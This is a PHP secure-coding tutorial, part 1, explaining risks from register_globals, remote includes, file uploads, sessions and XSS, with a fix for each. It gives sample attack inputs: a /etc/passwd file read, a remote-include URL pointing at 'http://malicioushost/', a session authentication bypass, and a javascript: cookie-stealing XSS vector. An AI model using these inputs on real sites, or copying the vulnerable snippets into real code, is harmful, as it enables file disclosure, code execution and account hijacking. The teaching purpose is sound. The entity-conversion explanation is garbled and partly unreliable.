PHP Programming Guidelines (Part 1)

Introduction

PHP (recursive acronym for PHP: Hypertext Preprocessor) is a widely-used server-side scripting language for creating dynamic web pages. Server-side means that the code is interpreted on the server before the result is sent to the client. PHP code is embedded in HTML code and it is really easy to get started with, while still very powerful for the experienced programmer. However being extremely feature rich and easy to get started with is not only positive, it to often leads to insecure applications vulnerable to several different kinds of attacks. This paper will try to explain the most common attacks and how we can protect ourselves against them.
Note: PHP is open-source and freely downloadable from www.php.net.

Global variables

2.1 Introduction

Variables declared outside of functions are considered global by PHP. The opposite is that a variable declared inside a function, is considered to be in local function scope.
PHP handles global variables quite differently compared to languages like C. In C a global variable is always available in local scope as well as global, as long as it is not overridden by a local definition. In PHP things are different; to access a global variable from local scope you have to declare it global in that scope. The following example shows this:

$sTitle = 'Page title'; // Global scope

function printTitle()
{
global $sTitle; // Declare the variable as global

echo $sTitle; // Now we can access it just like it was a local variable
}

All variables in PHP are represented by a dollar sign followed by the name of the variable. The names are case-sensitive and must start with a letter or underscore, followed by any number of letters, numbers, or underscores.

2.2. register_globals

The register_globals directive makes input from GET, POST and COOKIE, as well as session variables and uploaded files, directly accessible as global variables in PHP. This single directive, if set in php.ini, is the root of many vulnerabilities in web applications.
Let's start by having a look at an example:

if ( $bIsAlwaysFalse )
{
// This is never executed:
$sFilename = 'somefile.php';
}

...

if ( $sFilename != '' )
{
// Open $sFilename and send it's contents to the browser
...
}

If we were to call this page like: page.php?sFilename=/etc/passwd with register_globals set, it would be the same as to write the following:

$sFilename = '/etc/passwd'; // This is done internally by PHP

if ( $bIsAlwaysFalse )
{
// This is never executed:
$sFilename = 'somefile.php';
}

...

if ( $sFilename != '' )
{
// Open $sFilename and send it's contents to the browser
...
}

PHP takes care of the $sFilename = '/etc/passwd'; part for us. What this means is that a malicious user could inject his/her own value for $sFilename and view any file readable under the current security context.
We should always; I say that again, we should always think of that "what if" when writing code. So turning off register_globals might be a solution but what if our code ends up on a server with register_globals on. We must bear in mind that all variables in global scope could have been tampered with. The correct way to write the above code would be to make sure that we always assign a value to $sFilename:

// We initialize $sFilename to an empty string
$sFilename = '';

if ( $bIsAlwaysFalse )
{
// This is never executed:
$sFilename = 'somefile.php';
}

...

if ( $sFilename != '' )
{
// Open $sFilename and send it's contents to the browser
...
}

Another solution would be to have as little code as possible in global scope. Object oriented programming (OOP) is a real beauty when done right and I would highly recommend you to take that approach. We could write almost all our code in classes which is generally safer and promotes reuse.
Like we never should assume that register_globals is off we should never assume it is on. The correct way to get input from GET, POST, COOKIE etc is to use the superglobals that were added in PHP version 4.1.0. These are the $_GET, $_POST, $_ENV, $_SERVER, $_COOKIE, $_REQUEST $_FILES, and $_SESSION arrays. The term superglobals is used since they are always available without regard to scope.

2.3. Includes and Remote files

The PHP functions include() and require() provides an easy way of including and evaluating files. When a file is included, the code it contains inherits the variable scope of the line on which the include statement was executed. All variables available at that line will be available within the included file. And the other way around, variables defined in the included file will be available to the calling page within the current scope.
The included file does not have to be a file on the local computer. If the allow_url_fopen directive is enabled in php.ini you can specify the file to be included using an URL. That is PHP will get it via HTTP instead of a local pathname. While this is a nice feature it can also be a big security risk. Note: The allow_url_fopen directive is enabled by default.
A common mistake is not considering that every file can be called directly, that is a file written to be included is called directly by a malicious user. An example:

// file.php

$sIncludePath = '/inc/';

include($sIncludePath . 'functions.php');

...

// functions.php

include($sIncludePath . 'datetime.php');
include($sIncludePath . 'filesystem.php');

In the above example functions.php is not meant to be called directly, so it assumes $sIncludePath is set by the calling page. By creating a file called datetime.php or filesystem.php on another server (and turning off PHP processing on that server) we could call functions.php like the following:
functions.php?sIncludePath=http://malicioushost/
PHP would nicely download datetime.php from the other server and execute it, which means a malicious user could execute code of his/her choice in functions.php.
I would recommend against includes within includes (as the example above). In my opinion it makes it harder to understand and get an overview of the code. But right now we want to make the above code safe and to do that we make sure that functions.php really is called from file.php. The code below shows one solution:

// file.php

define('SECURITY_CHECK', true);

$sIncludePath = '/inc/';

include($sIncludePath . 'functions.php');

...

// functions.php

if ( !defined('SECURITY_CHECK') )
{
// Output error message and exit.
exit('Security check failed.')
}

include($sIncludePath . 'datetime.php');
include($sIncludePath . 'filesystem.php');

The function define() defines a constant. Constants are not prefixed by a dollar sign ($) and thus we can not break this by something like: functions.php?SECURITY_CHECK=1
Although not so common these days you can still come across PHP files with the .inc extension. These files are only meant to be included by other files. What is often overlooked is that these files, if called directly, does not go through the PHP preprocessor and thus get sent in clear text. We should be consistent and stick with one extension that we know gets processed by PHP. The .php extension is the recommended.

2.4. File upload

PHP is a feature rich language and one of it is built in features is automatic handling of file uploads. When a file is uploaded to a PHP page it is automatically saved to a temporary directory. New global variables describing the uploaded file will be available within the page.
Consider the following HTML code presenting a user with an upload form:

After submitting the above form, new variables will be available to page.php based on the "testfile" name.
Variables set by PHP and what they will contain:

// A temporary path/filename generated by PHP. This is where the file is saved until we
// move it or it is removed by PHP if we choose not to do anything with it:
$testfile

// The original name/path of the file on the client's system:
$testfile_name

// The size of the uploaded file in bytes:
$testfile_size

// The mime type of the file if the browser provided this information. For example "image/jpeg":
$testfile_type

A common approach is to check if $testfile is set and if it is, start working on it right away, maybe copying it to a public directory, accessible from any browser. You probably already guessed it; this is a very insecure way of working with uploaded files. The $testfile variable does not have to be a path/file to an uploaded file. It could come from GET, POST, and COOKIE etc. A malicious user could make us work on any file on the server, which is not very pleasant.
First of all, like I mentioned before we should not assume anything about the register_globals directive, it could be on or off for all we care, our code should work with or without it and most importantly it will be just as secure regardless of configuration settings. So the first thing we should do is to use the $_FILES array:

// The temporary filename generated by PHP:
$_FILES['testfile']['tmp_name']

// The original name/path of the file on the client's system:
$_FILES['testfile']['name']

// The mime type of the file if the browser provided this information. For example "image/jpeg":
$_FILES['testfile']['type']

// The size of the uploaded file in bytes:
$_FILES['testfile']['size']

The built in functions is_uploaded_file() and/or move_uploaded_file() should be called with $_FILES['testfile']['tmp_name'] to make sure that the file really was uploaded by HTTP POST. The following example shows a straightforward way of working with uploaded files:

if ( is_uploaded_file($_FILES['testfile']['tmp_name']) )
{

// Check if the file size is what we expect (optional)
if ( $_FILES['testfile']['size'] > 102400 )
{
// The size can not be over 100kB, output error message and exit.
...
}

// Validate the file name and extension based on the original name in $_FILES['testfile']['name'],
// we do not want anyone to be able to upload .php files for example.
...

// Everything is okay so far, move the file with move_uploaded_file
...
}

Note: We should always check if a variable in the superglobals arrays is set with isset() before accessing it. I choose not to do that in the above examples because I wanted to keep them as simple as possible.

2.5. Sessions

Sessions in PHP is a way of saving user specific variables or "state" across subsequent page requests. This is achieved by handing a unique session id to the browser which the browser submits with every new request. The session is alive as long as the browser keeps sending the id with every new request and not to long time passes between requests.
The session id is generally implemented as a cookie but it could also be a value passed in the URL. Session variables are saved to files in a directory specified in php.ini, the filenames in this directory are based on the session ids. Each file will contain the variables for that session in clear text.
First we are going to look at the old and insecure way of working with sessions; unfortunately this way of working with sessions is still widely used.

// first.php

// Initialize session management
session_start();

// Authenticate user
if ( ... )
{
$bIsAuthenticated = true;
}
else
{
$bIsAuthenticated = false;
}

// Register $bIsAuthenticated as a session variable
session_register('bIsAuthenticated');

echo '<a href="second.php">To second page</a>';

// second.php

// Initialize session management
session_start();

// $bIsAuthenticated is automatically set by PHP
if ( $bIsAuthenticated )
{
// Display sensitive information
...
}

Why is this insecure? It is insecure because a simple second.php?bIsAuthenticated=1 would bypass the authentication in first.php.
session_start() is called implicitly by session_register() or by PHP if the session.auto_start directive is set in php.ini (defaults to off). However to be consistent and not to rely on configuration settings we always call it for ourselves.
The recommend way of working with sessions:

// first.php

// Initialize session management
session_start();

// Authenticate user
if ( ... )
{
$_SESSION['bIsAuthenticated'] = true;
}
else
{
$_SESSION['bIsAuthenticated'] = false;
}

echo '<a href="second.php">To second page</a>';

// second.php

// Initialize session management
session_start();

if ($_SESSION['bIsAuthenticated'] )
{
// Display sensitive information
...
}

Not only is the above code more secure it is also, in my opinion, much cleaner and easier to understand.
Note: On multi host system remember to secure the directory containing the session files, otherwise users might be able to create custom session files for other sites.

3. Cross site scripting (XSS)

3.1. XSS and PHP

Consider a guestbook application written in PHP. The visitor is presented with a form where he/she enters a message. This form is then posted to a page which saves the data to a database. When someone wishes to view the guestbook all messages are fetched from the database to be sent to the browser.
For each message in the database the following code is executed:

// $aRow contains one row from a SQL-query
...
echo '<tr>';
echo '<td>';
echo $aRow['sMessage'];
echo '</td>';
echo '</tr>';
...

What this means is that exactly what is entered in the form is later sent unchanged to every visitor's browser. Why is this a problem? Picture someone entering the character < or >, that would probably break the page's formatting. But we should be happy if that is all that happens. This leaves the page wide open for injecting JavaScript, HTML, VBScript, Flash, ActiveX etc. A malicious user could use this to present new forms, fooling users to enter sensitive data. Unwanted advertising could be added to the site. Cookies can be read with JavaScript on most browsers and thus most session id's, leading to hijacked accounts.
What we want to do here is to convert all characters that have special meaning to HTML into HTML entities. Luckily PHP provides a function for doing just that, this function is called htmlspecialchars and converts the characters ", &, < and > into &, ", < and >. (PHP has another function called htmlentities which converts all characters that have HTML entities equivalents, but htmlspecialchars suits our needs perfectly.)

// The correct way to do the above would be:
...
echo '<tr>';
echo '<td>';
echo htmlspecialchars($aRow['sMessage']);
echo '</td>';
echo '</tr>';
...

One might wonder why we do not do this right away when saving the message to the database. Well that is just begging for trouble, then we would have to keep track of where the data in every variable comes from, and we would have to treat input from GET, POST differently from data we fetch from a database. It is much better to be consistent and call htmlspecialchars on the data right before we send it to the browser. This should be done on all unfiltered input before sending it to the browser.

3.2. Why htmlspecialchars is not always enough

Let's take a look at the following code:

// This page is meant to be called like: page.php?sImage=filename.jpg
echo '<img src="' . htmlspecialchars($_GET['sImage']) . '" />';

The above code without htmlspecialchars would leave us completely vulnerable to XSS attacks but why is not htmlspecialchars enough? Since we are already in a HTML tag we do not need < or > to be able to inject malicious code. Take a look at the following:

// We change the way we call the page:
// page.php?sImage=javascript:alert(document.cookie);

// Same code as before:
echo '<img src="' . htmlspecialchars($_GET['sImage']) . '" />';

<img src="javascript:alert(document.cookie);" />

"javascript:alert(document.cookie);" passes right through htmlspecialchars without a change. Even if we replace some of the characters with HTML numeric character references the code would still execute in some browsers.

<img src="javascript:alert(document.cookie);" />

There is no generic solution here other than to only accept input we now is safe, trying to filter out bad input is hard and we are bound to miss something. Our final code would look like the following:

// We only accept input we know is safe (in this case a valid filename)
if ( preg_match('/^[0-9a-z_]+\.[a-z]+$/i', $_GET['sImage']) )
{
echo '<img src="' . $_GET['sImage'] . '" />';
}

All In One Blog